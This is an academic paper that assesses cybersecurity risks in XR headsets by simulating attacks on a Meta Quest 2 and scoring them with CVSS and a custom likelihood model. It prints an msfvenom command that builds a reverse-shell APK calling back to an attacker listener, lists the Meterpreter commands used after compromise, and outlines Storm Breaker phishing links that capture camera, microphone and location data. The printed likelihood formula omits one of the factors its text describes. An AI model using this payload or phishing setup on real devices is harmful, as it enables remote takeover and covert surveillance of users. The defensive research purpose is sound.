Next Article in Journal
Development and Evaluation of a Multi-Robot Path Planning Graph Algorithm
Next Article in Special Issue
Global Navigation Satellite System Spoofing Attack Detection Using Receiver Independent Exchange Format Data and Long Short-Term Memory Algorithm
Previous Article in Journal
Enhancing EFL Speaking Skills with AI-Powered Word Guessing: A Comparison of Human and AI Partners
Previous Article in Special Issue
Understanding User Behavior for Enhancing Cybersecurity Training with Immersive Gamified Platforms
 
 
Font Type:
Arial Georgia Verdana
Font Size:
Aa Aa Aa
Line Spacing:
Column Width:
Background:
Article

A Cybersecurity Risk Assessment for Enhanced Security in Virtual Reality

by
Rebecca Acheampong
1,*,
Dorin-Mircea Popovici
1,2,
Titus C. Balan
1,
Alexandre Rekeraho
1 and
Ionut-Alexandru Oprea
1
1
Faculty of Electrical Engineering and Computer Science, Transilvania University of Brasov, 500036 Brasov, Romania
2
Faculty of Mathematics and Computer Science, Ovidius University of Constanta, 900527 Constanta, Romania
*
Author to whom correspondence should be addressed.
Information 2025, 16(6), 430; https://doi.org/10.3390/info16060430
Submission received: 10 March 2025 / Revised: 24 April 2025 / Accepted: 20 May 2025 / Published: 23 May 2025
(This article belongs to the Special Issue Extended Reality and Cybersecurity)

Abstract

:
Our society is becoming increasingly dependent on technology, with immersive virtual worlds such as Extended Reality (XR) transforming how we connect and interact. XR technologies enhance communication and operational efficiency. They have been adopted in sectors such as manufacturing, education, and healthcare. However, the immersive and interconnected nature of XR introduces security risks that span from technical and human to psychological vulnerabilities. In this study, we examined security threats in XR environments through a scenario-driven risk assessment, using a hybrid approach combining Common Vulnerability Scoring System (CVSS) metrics and a custom likelihood model to quantify risks. This methodology provides a comprehensive risk evaluation method, identifying critical vulnerabilities such as Remote Code Execution (RCE), social engineering, excessive permission exploitation, unauthorized access, and data exfiltration. The findings reveal that human vulnerabilities, including users’ susceptibility to deception and excessive trust in familiar interfaces and system prompts, significantly increase attack success rates. Additionally, developer mode, once enabled, remains continuously active, and the lack of authentication requirements for installing applications from unknown sources, coupled with poor permission management on the part of the users, creates security gaps that attackers can exploit. Furthermore, permission management in XR devices is often broad and persistent and lacks real-time notifications, allowing malicious applications to exploit microphone, camera, and location access without the users knowing. By leveraging CVSS scores and a structured likelihood-based risk assessment, we quantified the severity of these threats, with RCE, social engineering, and insecure app installation emerging as the greatest risks. This study highlights the necessity of implementing granular permission controls, formalized developer mode restrictions, and structured user education programs to mitigate XR-specific threats.

1. Introduction

As society becomes increasingly reliant on technologies, it is simultaneously exposed to a broader range of cybersecurity threats [1]. Even the most secured network architectures can be compromised by human errors such as clicking on phishing emails, unintentional data leakage, and poor password practices [2], in turn putting information systems at risk. To counteract these risks, cybersecurity measures like firewalls, Intrusion Detection and Prevention Systems (IDPSs) [3], and secure software development lifecycles have been employed to protect data confidentiality, integrity, and availability [4]. However, as computing systems evolve and integrate complex hardware, new challenges emerge, particularly in XR environments, where social interactions extend beyond the real world [5].
The emergence of XR technologies builds on decades of research into human–computer interaction, virtual environments, and ubiquitous computing [6]. XR is used as a collective term for immersive technologies that merge the physical and digital worlds [7]. It includes Virtual Reality (VR), which offers fully simulated environments, and Augmented Reality (AR), which overlays digital content onto a user’s real-world surroundings [8]. These systems have evolved from isolated, device-centric systems into highly interconnected platforms. They integrate sensors, cloud computing, and real-time multi-user interaction [9]. As XR acceptance extends beyond gaming and entertainment into critical sectors such as healthcare, gaming, and remote collaboration, this growth introduces unique cybersecurity risks [10].
XR systems, due to their unique architectures, interconnected components, and reliance on networked platforms, face increased cybersecurity risks [11]. They operate within complex ecosystems consisting of hardware, software, cloud services, and third-party applications [12]. While these interconnected systems enhance immersive experiences, they also expand the attack surface, making XR platforms attractive targets for cyber threats. A reliance on multiple synchronized components creates security blind spots such as unmonitored sensor data streams and delayed permission checks that adversaries can exploit to gain unauthorized access [13].
Hardware components such as camera and audio sensors, motion trackers, haptic feedback devices, ambient sensors, gyroscopes, accelerometers, and depth sensors play a critical role in real-time user interactions [3]. However, their extensive data collection capabilities also introduce privacy and security concerns. Compromised XR sensors can be leveraged for surveillance, unauthorized tracking, or data manipulation, threatening both user privacy and system integrity [14].
Real-world studies have highlighted the feasibility of XR-based cyberattacks. For instance, Shi et al. [15] demonstrated how attackers could exploit gyroscope and accelerometer data from VR headsets to reconstruct facial movements and eavesdrop on conversations, violating user privacy [16]. Moreover, adversaries can manipulate virtual objects, inject false positional data, or disrupt spatial mapping mechanisms to distort users’ perceptions within the virtual world [17]. The modifications of spatial boundaries can result in chaperon attacks causing users to lose awareness of their physical space and potentially suffer physical injuries [10,14].
Casey et al. demonstrated how manipulating the spatial space in XR can teleport users without their knowledge [14], posing a potentially life-threatening risk that also endangers business operations [16]. While many recent cyber-attacks have exploited human vulnerabilities either through human error or psychological factors [18], the 2023 Imperva Bad Bot Report highlights a rise in security threats within the gaming industry, with many attacks exploiting immersive features such as real-time player interactions, virtual economies, and in-game assets. These systems, central to the immersive nature of online gaming, were abused by bots to automate gameplay, farm virtual currencies, or gain unfair competitive advantages [19,20].
Dastgerdy, S. [21] emphasized that the consequences of cybersecurity breaches in XR environments vary across different application domains. In high-risk scenarios, XR cyberattacks can result in severe consequences, including loss of life or a business collapse. For example, a denial-of-service (DoS) attack on an XR-based medical system could disrupt real-time surgical procedures, leading to patient harm [22]. The immersive nature of XR introduces distinct risks related to user perception and behavior. This environment creates opportunities for social engineering, psychological manipulation, and immersive deception, each of which generates critical concerns for XR security [23].
The intersection of technical gaps, user behavior, and real-world impacts emphasizes the importance of systematic evaluations of security threats in XR environments [24]. Various cybersecurity strategies such as penetration testing, vulnerability scanning, and risk assessment frameworks have been developed to mitigate security gaps [25]. Some of these methodologies are platform-specific, while others offer generalized security models that organizations can tailor to their unique XR system designs [26].
This study focuses specifically on standalone XR headsets and Android-based AR applications, assessing client-side attack vectors related to application installation, user permissions, and sensor access. Building on this scope, we introduce a scenario-driven cybersecurity risk assessment strategy utilizing a structured likelihood-based assessment model and Common Vulnerability Scoring System (CVSS) metrics to quantify XR-specific risks. Using a penetration-testing approach, this strategy can demonstrate real-world attack tactics such as reverse shell payloads, permission-based exploits, and phishing via XR platforms.
The aim of this research is to analyze and prioritize security threats in XR environments by simulating real-world attack scenarios and quantifying risks through a hybrid scoring approach. Some of the key contributions of this research are given below:
  • We designed a practical, scenario-driven methodology for evaluating cybersecurity risks in XR systems using penetration tactics.
  • We introduced a structured-likelihood-based model incorporating user behavior, system exposure, vulnerability exploitability, and attack popularity factors.
  • We quantified security risks using a hybrid approach combining CVSS and a custom likelihood model.
  • We conducted an analysis of XR platform design (e.g., developer mode and permission handling) and how these elements introduce exploitable security gaps.
While traditional security frameworks or attack-modeling techniques have been applied to XR in prior research [27], few studies have adopted a scenario-driven, exploit-based methodology rooted in real-world tools and threat simulations. Moreover, the integration of structured likelihood modeling tailored to human behavior and XR-specific permission systems remains underexplored. In this study, we addressed this gap by simulating XR-specific threats using common adversarial tools and evaluating risk with a hybrid scoring approach.
The rest of our study is organized as follows: Section 2 explores XR security challenges, while Section 3 presents a review of related studies. Section 4 introduces real-world attack scenarios. Section 5 details the risk assessment methodology and is followed by Section 6, which discusses findings. Section 7 presents recommendations, and Section 8 concludes the study.

2. Cybersecurity Challenges in XR

Examining the security risks present in XR environments exposes a complex landscape where traditional cybersecurity concerns mix with novel challenges specific to immersive technologies [13]. XR systems present a broader attack surface due to their reliance on sensor-rich environments, real-time data processing, and interconnected hardware and software components. These elements introduce new security concerns that extend beyond conventional IT infrastructure, demanding specialized risk mitigation strategies.
One of the most critical concerns in XR environments is data privacy [28]. Unlike traditional digital platforms, XR systems collect, process, and store a vast range of sensitive user data, including behavioral patterns, biometric data, and spatial mapping information [17,29].
To deliver immersive experiences, XR devices rely on a variety of sensors, such as gyroscopes, accelerometers, cameras, depth sensors, and biometric scanners [15]. However, these same sensors introduce privacy vulnerabilities, making sensor spoofing, data manipulation, and unauthorized access possible. Attackers may exploit sensor data to infer sensitive user details, engage in motion-tracking surveillance, or even manipulate sensor outputs to distort virtual experiences [30]. Similarly, users’ movements can be controlled by the attacker, leading them to a specified physical location without their awareness [10].
Unauthorized access, which includes a variety of methods by which malicious actors may compromise user accounts and devices, exploit unsafe network connections to intercept credentials, and take advantage of software or hardware vulnerabilities in XR platforms, represents another critical risk in XR environments [20,31]. The gaming industry, an early adopter of XR technologies, faces severe unauthorized access threats. According to the Akamai 2022 report [32], attackers frequently target gamers’ accounts to steal in-game assets, currencies, and profile information, which are later sold on the dark web.
In XR environments, the boundary between physical and virtual spaces is blurred, leading to unique safety challenges. Attackers may manipulate virtual objects, alter spatial setups, or inject malicious content to disrupt user experiences [14,15].
For instance, Local File Inclusion (LFI) attacks have been used in XR applications to exploit running scripts, access player data, and gain unfair advantages in gaming environments [32]. Such manipulations not only compromise fair gameplay but also pose physical safety risks, as users rely on virtual objects for navigation and interaction. Similarly, modifications of the boundaries can result in chaperon attacks, causing users to lose track of their physical space boundaries [14]. In situations like AR navigation, virtual overlay attacks can occur, which could lead users astray or even cause an accident [33]. All these issues pose both security and safety risks.
XR applications heavily depend on network connectivity to synchronize data across devices, servers, and cloud platforms. However, poorly secured communication channels expose users to data interception and eavesdropping on sensitive information; man-in-the-middle (MITM) attacks, which alter transmitted data; and denial-of-service (DoS) attacks, which can disrupt XR applications through targeted overloads [34].
If network security is compromised, XR users may experience session hijacking, unauthorized surveillance, or loss of control over virtual environments.
The immersive nature of XR environments introduces new vectors for psychological manipulation and social-engineering attacks. Deep immersion causes users to lose track of their self-awareness [35]. Adversaries can exploit immersion by impersonating trusted entities in virtual spaces, using deceptive avatars or environments to manipulate user behavior or extract sensitive information through interactive deception techniques [36].
The Imperva Bad Bot Report 2023 [19] and studies by Sead Fadilpašić [31,32] document numerous security threats affecting the gaming industry, emphasizing how XR spaces are vulnerable to sophisticated forms of social engineering.
Malware remains one of the most dangerous threats in XR environments. Attackers exploit malicious APKs, spyware, and trojans to gain unauthorized access to XR devices, manipulate virtual environments, or steal sensitive data [12]. The high level of interconnectivity in XR platforms, particularly through social media and cloud-based services, enables malware to spread rapidly, affecting a large number of devices with minimal effort. This widespread distribution can have far-reaching security implications, ranging from privacy violations to full-device jeopardization.
Researchers such as Vondracek et al. [37] have assessed the severity of malware-based attacks in XR environments. They simulated a Man-in-the-Room (MITR) attack, showcasing how malicious code can manipulate virtual spaces, compromise user sessions, and alter perceived reality within immersive environments.
Malware delivery in XR environments often relies on social-engineering techniques and deceptive links to trick users into downloading infected applications. Additionally, spyware and trojans embedded in third-party app stores or sideloaded VR applications represent a significant attack vector. Once introduced into an XR system, malware can lead to severe consequences, including privacy violations, device hijacking, and disrupted virtual experiences.
While data privacy, sensor hijacking, and malware are threats common to many internet-enabled systems, XR introduces unique vulnerabilities due to its immersive nature and fusion of physical and virtual contexts. Unlike smartphones or IoT devices, XR systems rely on continuous spatial tracking, environmental mapping, and gesture recognition, creating a persistent, real-time feedback loop between user behavior and system responses [38]. This makes the consequences of an exploit not only digital but also physical, including disorientation, virtual object tampering, and unsafe locomotion [14]. The blurred boundary between physical and virtual space in XR can be exploited to manipulate perception, influence decision-making [13], and even induce physical harm, risks that do not typically apply when using non-XR systems.
Table 1 illustrates the applicability of common internet-based attacks and highlights their distinct exploitation pathways in XR systems.

Platform-Level Security and Privacy Limitations in XR Ecosystems

XR platforms such as Meta Quest 2 (Oculus) operate on modified Android-based systems [9] and include several security mechanisms designed to control access to sensitive data streams like cameras, microphones, and location [39]. These include app sandboxing, permission prompts, and by-default restrictions on sideloading apps from unknown sources.
However, the effectiveness of these control measures is limited by user behavior and developer features. For instance, in order to sideload applications, users must manually enable Developer Mode, a feature intended for testing but often required to install apps outside the official store. This action removes many of the default restrictions, enabling the installation of unsigned or unvetted APKs.
Once sideloading is allowed, permission prompts vary by application behavior. In many cases, apps request access to sensitive sensors (camera, mic, and location) only once, during installation or first use. These prompts are often vague and lack context or justification, making users more likely to grant access without scrutiny, especially in immersive environments, where prompts may be integrated into the virtual interface itself [14].
The Oculus Store does offer an app review process, but many users also access apps via SideQuest, a third-party platform that functions more like a “Wild West” environment. Apps on SideQuest are not subject to the same vetting and can be installed freely once Developer Mode is active.
These findings highlight how the XR ecosystem’s current security paradigm, especially around permissions, sensor access, and app distribution, creates conditions suitable for exploitation by attackers.

3. Related Studies

Only a few researchers have explored risk assessment in AR and VR environments, each proposing different frameworks for evaluating security, privacy, and safety risks. The standard methods used to analyze and address security issues in systems include layered design, vulnerability detection, penetration testing, and proof of correctness [12]. In addition, automated and dynamic security tools provide a quick security assessment to expose hidden vulnerabilities, enhancing the efficiency of security evaluations [40].
Guo et al. [9] conducted a study in which the VR-SP assessment tool was used to evaluate the security of VR applications. They collected 500 apps from the SideQuest and Oculus Stores, extracted their APK files, and decompiled them to analyze the program structures. This approach allowed them to perform a comprehensive security assessment of both the platform and operating system. Their findings revealed inherent security flaws in the hash functions and encryption algorithms used within these applications.
Although this work offers a robust analysis of XR app-level vulnerabilities, it primarily focuses on static code analysis and lacks information gathered using a broader threat-modeling approach or exploit simulation that ties vulnerabilities to specific user or attacker behaviors.
Reconnaissance is a critical phase in the cyber kill chain. Sarina Dastgerdy approached the object of their study by gathering information and analyzing vulnerabilities, categorizing security risks into three key areas: physical devices, applications, and development platforms. Their findings highlighted common threats, including cross-site scripting, eavesdropping, and remote code execution [21].
While their study provides a useful classification of XR threats, it remains descriptive and static, emphasizing the relevance of the reconnaissance and vulnerability identification phases in ethical hacking. Additionally, it lacks a structured methodology for quantifying or prioritizing risks, and the author did not employ practical attack simulations or scoring mechanisms.
Robyn R. Lutz, in his study, performed a safety risk analysis on an AR app for automotive use, specifically the AR Left-Turn Assist [41]. His study introduced a human-centric risk analysis focused on situational awareness, categorizing risks under perception, comprehension, and decision-making. Using Bi-Directional Safety Analysis, the author identified four failure modes: absent/missing output, incorrect output, wrong output, and excessive output. It was found that missing overlays could lead to fatal accidents due to a lack of situational awareness, while incorrect or delayed overlays could result in poor decision-making [42].
Although this study offers valuable insights into safety-critical AR systems, its primary focus is on safety and human–machine interaction rather than cybersecurity threats. Furthermore, its application domain is restricted to automotive use cases, limiting its generalizability to broader XR environments.
The authors of another study applied attack trees [43] to assess risks in vSocial, a Virtual Reality Learning Environment [44]. The researchers aimed to characterize threats to security, privacy, and safety, prioritizing them using risk assessment metrics. The attack model targeted the vSocial server on the Steam platform, with threats including malicious network discrepancies, packet sniffing, and denial-of-service (DoS) attacks. By simulating attacks and analyzing network packets using Wireshark and Clumsy, the researchers measured user experience impacts and assigned risk values based on probability, attack cost, and data loss [27]
While this approach successfully demonstrated a structured risk prioritization method, it remains largely conceptual and focused on network-layer vulnerabilities. Moreover, the cited study lacked a quantitative vulnerability scoring system and did not integrate real-world exploitation.
Silva et al. conducted a survey to identify cybersecurity attacks targeting VR and AR. They then performed a risk assessment of these threats by evaluating both their probability and impact, grouping the risks into specific domains. Their findings indicate that the education and healthcare sectors are the most vulnerable [10].
However, their approach was based on collected perception data rather than technical simulations, and the risk-scoring approached employed was qualitative, with no integration of standardized models such as CVSS or structured likelihood metrics.
In the reviewed studies, the following limitations were identified:
  • The primary focus was safety, general risk awareness, or categorization rather than technical system-level cybersecurity threats.
  • The authors used theoretical models without simulating real-world exploits or making practical demonstrations.
  • The authors employed domain-specific XR systems or relied on survey-based perceptions, limiting technical depth and generalizability.
  • No standardized vulnerability-scoring frameworks like CVSS were used to assess and prioritize sever risk.
In Table 2, a comparison of the literature with the current study is presented. This study enhances XR security research through practical, scenario-driven risk assessments, exploiting inherent vulnerabilities to address novel cybersecurity threats that prior research has not considered.

4. Case Studies and Threat Model

4.1. Threat Model

In this study, we modeled an attacker targeting XR environments through user-level and network-level attack vectors. Before presenting the specific attack simulations and methodological procedures, we define the threat model that underpins this study. This model describes the assumed capabilities, objectives, and constraints of the attacker in the context of XR environments. The attacker is assumed to have the following capabilities.
  • Attacker Capabilities
The attacker is assumed to possess access to publicly available penetration-testing tools such as MSFvenom [45], Metasploit [46], Storm Breaker [47], and Ngrok [48]. They are skilled in social-engineering techniques and capable of hosting malicious payloads and phishing pages on remote servers. We do not assume the attacker has physical access to the XR device; the attacks are assumed to be conducted entirely remotely.
  • Initial Access
The attacker assumes the victim can be lured into clicking malicious links via XR browsers (e.g., Oculus Browser) and installing unauthorized APK files. The victim has developer mode enabled either by default or due to prior use. This enables the execution of reverse shell payloads and the exfiltration of sensitive data.
  • Objectives
The primary goal is to gain persistent access to the XR device, exfiltrate personal data (e.g., audio recordings, location, etc.), interact with system services, and maintain undetected control. This may include manipulating device behavior or disabling system boundaries such as spatial limits and guardian systems.
  • Assumptions
It is assumed that the device allows APK sideloading and is connected to the internet. It is also assumed that the user will grant microphone, location, and camera permissions when prompted. The device is assumed to be connected to the internet and does not have security mechanisms such as advanced intrusion detection tools actively monitoring threats.
  • Success Metrics
An attack is considered successful if the adversary is able to establish a reverse shell connection with the XR device, execute arbitrary commands remotely, and access system files, sensors, or services without being detected. Furthermore, the attacker must be capable of exfiltrating data—such as audio recordings, location information, or system logs—in a manner consistent with known real-world malware behaviors

4.2. Experimental Setup and Methodology

We focused on developing and analyzing attack scenarios to identify threats and vulnerabilities in relation to immersive technologies in order to develop a risk assessment framework. This section describes the technical steps, tools, and experimental setups used to simulate and assess the attack scenarios, as well as the process of deriving a cybersecurity framework based on the findings. We employed a custom approach, where we simulated threat actions that are possible attacks within the immersive ecosystem to identify vulnerabilities in order to evaluate the implications of these vulnerabilities to inform a risk assessment.
Figure 1 and Figure 2 describe the attack workflow of the scenarios, while the details of the process are clearly described in the Section 4.3.
The tools employed in this study include widely adopted penetration testing platforms and social-engineering toolkits, chosen for their alignment with real-world behaviors exhibited in attacks targeting XR devices.
The Metasploit Framework was used as a primary exploitation platform due to its modular architecture, which supports auxiliary scanning, exploit execution, payload delivery, and post-exploitation tasks [46]. As a standard penetration platform, it is widely known for its support for multiple platforms, including Windows, Kali, Android, etc. [25]. Payloads were created using MSFvenom, a Metasploit component that combines Msfpayload and Msfencode into a single Framework, allowing for the development of various customized payloads, including backdoors, trojans, and shellcode for different operating systems [49].
The Apache2 Web Server was deployed as the payload host, serving as a legitimate content delivery point from which the malicious APK could be downloaded for social-engineering attacks. For scenarios involving sensor-level surveillance and reconnaissance, Storm Breaker was used. This social-engineering toolkit facilitates remote access to a victim’s microphone, camera, and location data through deceptive web interfaces. It comes with a web panel that remotely tracks victims’ responses in real-time and captures extracted data for analysis [47].
The chosen tools (MSFvenom and Storm Breaker) reflect techniques frequently documented as being used in real-world mobile security threats, such as the use of Android malware kits and phishing payload delivery via Ngrok. They were selected for this study because of their ability to simulate behaviors documented in public threat intelligence databases, allowing replicable exploitation of known XR vulnerabilities. The scenarios developed in this study simulate vulnerabilities commonly exploited in mobile and XR-based environments, ensuring realism and applicability.
While the Meterpreter payload has previously been used in XR-related security research [14], tools such as MSFvenom and Storm Breaker have not been explicitly applied within XR contexts. This study extends the use of these tools by adapting their traditional roles in Android exploitation to immersive scenarios involving XR browsers, user interaction, and permission-based abuse. In doing so, it reveals new exploit paths and attack surfaces specific to XR platforms that have not been systematically explored in prior work.
In the setup of this experiment, we used publicly available penetration-testing tools to simulate client-side attack vectors on XR platforms. For Scenario 1, MSFvenom was used to craft a reverse TCP payload (android/meterpreter/reverse_tcp) with the parameters (LHOST = 192.168.1.2, LPORT = 4444), embedded in a malicious APK and hosted on Apache2. The Metasploit multi-handler was configured to receive the reverse shell connection. Testing was performed on a Meta Quest 2 headset running Android 11, with developer mode enabled and installation from unknown sources allowed.
For Scenario 2, Storm Breaker, a social-engineering toolkit, was used to generate malicious phishing links) requested access to the target’s microphone, camera, and location data through deceptive prompts. Ngrok was configured so as to provide an external tunnel to the local listener interface, enabling access across networks. The phishing page was opened via the Oculus browser, and, when permission was granted, the toolkit collected data and sent them to the attacker-controlled panel. This setup reflects real-world tactics involving the deceptive social features within XR platforms and highlights the risks of permission abuse without persistent indicators.

4.3. Threat Scenarios

To address contribution 1, two practical attack scenarios were simulated, targeting XR devices and AR applications to simulate real-world exploitation paths. These scenarios demonstrate how attackers can exploit XR environments using social engineering, remote access tools, and permission-based exploits.
1. 
Scenario 1: Remote Command Execution on Oculus Quest 2 via Malicious APK
In the first scenario, we tested the feasibility of delivering a malicious APK file to an Oculus Quest 2 device using MSFvenom (Meta Platforms, Inc., Menlo Park, CA, USA). The payload, with a size of 10,235 bytes, was hosted on an Apache2 web server and delivered through the Oculus browser. As shown in Figure 3, MSFvenom utility was used to generate a malicious APK containing a reverse TCP payload:(msfvenom -p android/meterpreter/reverse_tcp LHOST = 192.168.0.103 LPORT = 4444 R > atak.apk). This output validates that the payload was successfully created for further use in the attack simulation targeting XR devices.
Under normal circumstances, an attacker would employ social-engineering techniques to persuade a user to click on a malicious link, or they would embed an APK file within an image or advertisement. Once the user clicks the link, the APK file is downloaded and installed on the VR device.
After the malicious application was successfully installed, a reverse TCP connection was established, allowing the malicious user to execute remote commands on the device. Using Metasploit’s multi-handler exploit, a listener was opened to intercept and control the compromised device. As illustrated in Figure 4, the Metasploit multi-handler successfully opened a Meterpreter session with the target XR device after the payload was executed. The sysinfo command confirms full remote access to system-level data, including OS version, architecture, and language settings, demonstrating the feasibility of real-world remote exploitation. This connection enabled the execution of shell commands allowing full access to the VR system.
Once the connection was established, the following Meterpreter-specific commands were executed to gather device information that could be used to escalate privileges:
  • sysinfo—retrieves system information;
  • app_list—lists installed applications on the VR device;
  • getuid—displays the user ID under which the exploit is running;
    shell commands—allows interaction with the device’s file system and processes, executing commands such as ls (list directory contents), pwd (print working directory),
    ps (list running processes), and cat <file> (read the contents of a file).
As shown in Figure 5, the attacker was able to retrieve a full inventory of installed applications and system services. This reconnaissance step enables adversaries to identify high-value services for exploitation, such as those managing user authentication (com.meta.AccountsCenter) or spatial boundary enforcement (com.oculus.guardian). Disabling or modifying these services may result in persistent access, the ability to bypass authentication, or even physical safety risks in immersive environments.
2. 
Scenario 2: Eavesdropping and Surveillance Via Oculus Quest 2
The second scenario focuses on eavesdropping and unauthorized surveillance, exploiting user permissions in Oculus Quest 2 and AR applications on Android devices. This attack highlights the risks associated with misconfigured permissions and social-engineering tactics.
We used Storm Breaker, a social-engineering and reconnaissance toolkit available on Kali Linux, to create a malicious phishing link [25]. Ngrok was used for port forwarding, allowing external connections to access the attacker’s local listening server. Figure 6 demonstrates the Storm Breaker server with an Ngrok port-forwarding number.
Figure 7 displays the Ngrok-generated URLs produced by Storm Breaker for each social-engineering template, including access to the microphone, camera, location, and system information. Each URL corresponds to a deceptive feature designed to lure the user into granting access to sensitive sensors under the guise of XR functionality.
Once the target clicked the malicious link, they unknowingly granted the attacker access to their device’s microphone, camera, and location data.
Attack Components and Execution Details:
1. 
Location-Tracking Attack
A phishing link disguised as a social feature prompting users to find nearby friends on their VR device, is illustrated in Figure 8. When the link was opened in the Oculus browser, it extracted device information and geolocation data. The precise coordinates of the victim were sent to the attacker’s listening server, formatted as follows: https://google.com/maps/place/45.6556533+25.5802166 (accessed on 5 February 2025).
At this point, the attacker was tracking the victim’s location in real time, enabling stalking, unauthorized surveillance, or even physical threats. The information sent to the oculus quest 2 device is shown in Figure 9.
2. 
Microphone-Hijacking Attack
A microphone attack phishing link was sent to a target that requested microphone access under the pretense of asking for permission to use a VR voice feature. The victim granted permission for use of the microphone, unknowingly allowing the attacker to record all the user’s conversations. The recorded audio was then automatically transmitted to the attacker’s listening server, as shown in Figure 10. Conversations continued to be recorded and transmitted until the user manually closed the browser, often without becoming aware of the ongoing surveillance.
3. 
Camera Hijacking via AR Applications via AR Device
A malicious link was sent to the target, and, upon clicking the link, the user unknowingly granted camera access, allowing the attacker to remotely capture images or video. Since the camera continued running in the background, the victim was unaware of the attack. The attacker collected the video feed and images through the Storm Breaker admin panel, as shown in Figure 11.

5. Risk Assessment Methodology

We employed a systematic approach integrating multiple methodologies to conduct a comprehensive risk assessment of the two scenarios. It began with an analysis of each scenario to identify inherent threats, exploited vulnerabilities, and the impact on confidentiality, integrity, and availability—the CIA triad [50].
To enhance accuracy, we introduced established models like the NVD CVSS calculator [51] and reference standards such as the NIST [52]. Additionally, we developed a custom model to calculate the likelihood of each identified threat occurring and computed the risk scores.

5.1. Threats Identified in the Scenarios

1.
Scenario 1 highlights the following threats:
  • Remote Code Execution—The attacker gained remote access to the Oculus Quest 2 and could execute shell commands via Metasploit. The exploited vulnerability was “Malicious APK execution enables arbitrary code execution”. The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H.
  • Social engineering via phishing—The attacker relied on social engineering, tricking the user into clicking a malicious link or sideloading an APK. The exploited vulnerability was “lack of user awareness”. The vulnerability string was as follows:
    AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L
  • Insecure app installation—The user was tricked into granting developer permissions to install an application from an unknown source. The exploited vulnerability was “excessive permission abuse”. The vulnerability string was as follows: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L
  • Unauthorized access and data exfiltration—The attacker gained unauthorized access and used Meterpreter commands (cat <file>, ls, pwd, ps) to steal files and system data from the compromised XR device. The exploited vulnerability was “Exposure of sensitive information (files, messages, contacts)”. The vulnerability string was as follows:
    AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N.
2.
Scenario 2 highlights the following threats:
  • Eavesdropping via microphone—The phishing attack tricked the user into granting microphone permissions. The exploited vulnerability was “weak microphone permission control”. The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N.
  • Social engineering via phishing—Storm Breaker delivered deceptive links disguised as XR features. The exploited vulnerability was “lack of awareness”. The vulnerability string was as follows: The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L
  • Surveillance via camera—An XR browser exploit granted the attacker access to live video feeds. The exploited vulnerability was “no persistent camera indicator”. The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N.
  • Real-time location tracking—The attacker extracted precise GPS coordinates through deceptive permission. The exploited vulnerability was “lack of strict location access rules”. The vulnerability string was as follows: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N.

5.2. Risk Analysis

Risk represents the potential loss arising from three key variables: the likelihood of an attack, the vulnerability that the attack exploits, and the possible cost incurred if the attack succeeds [53]. When vulnerabilities are exploited, they compromise one or more of the components of the CIA triad. The primary goal of risk analysis is to assess both the impact of potential threats and the effectiveness of each attack path [54].
Achievable by using the risk formula
R i s k = T h r e a t × V u l n e r a b i l i t y × I m p a c t ,
it is important to define and quantify the factors that determine the likelihood, vulnerability, and impact values. In our risk assessment, we integrate the Common Vulnerability Scoring System (CVSS) to quantify the severity and potential impact of each vulnerability. CVSS scores range from a scale of 0.0 to 10.0. They enable organizations to evaluate and prioritize vulnerabilities based on their potential impact. These scores are derived using key metrics from the National Vulnerability Database (NVD)’s CVSS calculator, which assesses exploitability and impact [51]. The CVSS calculator, when computing the vulnerability score, generates the associated impact score, as illustrated in Figure 12.
To address contribution 2, we developed a custom model to quantify the probability of threat occurrence, specifically tailored to VR-related attack scenario. This model incorporates four key factors: User Behavior Susceptibility (UBS), Vulnerability Exploitation Ease (VEE), System Exposure Level (SEL), and Attack Popularity and Availability (APA). Given the interactive nature of VR environments, the model carefully balances both technical and human factors.
Each factor is scored on a 1–10 scale and assigned a weight between 1 and 10 to reflect its relative importance. Weighting each factor appropriately is crucial, as some factors may be more significant than others in real-world attacks. The study outlined in Table 3 the conditions considered when weighing each factor. The overall likelihood is calculated using the following formula:
Likelihood   Score = 3 × U B S + 2 × V E E + ( 3 × A P A ) 100
where the weights (i.e., 3 for User Behavior Susceptibility, 2 for Vulnerability Exploitation Ease, 2 for System Exposure Level, and 3 for Attack Popularity and Availability) reflect the relative importance of each factor in determining the likelihood of exploitation.
For instance, in Android malware attacks, user behavior (particularly social engineering) is a primary attack vector, leading experts to assign it a higher weight (3) due to its significant influence on exploitation success. Similarly, while zero-day vulnerabilities are rare, publicly available exploits, such as those found on Metasploit or GitHub, increase the probability of attacks, justifying a high weight for Attack Popularity and Availability (3).
On the other hand, System Exposure Level is assigned a weight of 2 because while exposure is important, not all vulnerabilities require external access to be exploited. Some attacks can occur locally, emphasizing that exposure alone is not the sole determinant of an attack’s feasibility.
A likelihood model was developed to reflect the behavioral and technical aspects of XR-specific threats. We assigned higher weights to UBS and APA because social engineering and public exploits were recurring vectors in recent XR and Android-based attack reports [55]. Factors such as SEL and VEE were assigned moderate weights to reflect their influence on feasibility without overwhelming the human-centric threat landscape of XR environments. Using the assigned weights, the likelihood of a threat occurring is calculated and presented in Table 4. Obtaining the likelihood values provides the necessary input to compute the risk score, which is calculated by multiplying the likelihood, impact, and vulnerability. The risk scores for each threat are illustrated in Table 5.

5.3. Risk Tolerance and Severity

Risk tolerance refers to the level of risk an entity is willing to accept or tolerate to achieve its objectives [56]. Establishing a risk tolerance level is vital for VR environments, as it helps determine the severity of the potential threats. A threat scale ranging from low to medium and high is used to assess severity and tolerance levels based on the scores obtained.
We set the scale as follows:
  • ≥30              ------>            High
  • 20–29.22     ------->           Medium
  • <20              -------->          Low
    Remote Code Execution (RCE)                        ------>     High
    Social Engineering                                             ------->     High
    Insecure App Installation                                  ------->     Medium
    Unauthorized Access and Data Exfiltration   -------->     Medium
    Eavesdropping                                                   -------->     Low
    Surveillance                                                        -------->     Low
    Location Tracking                                              -------->     Low

5.4. Risk Analysis Results

The risk assessment process was conducted using a scenario-driven methodology, evaluating threats against VR devices with likelihood, vulnerability, and impact metrics. The calculated risk scores based on the previously defined likelihood, vulnerability, and impact components are summarized in Table 6.
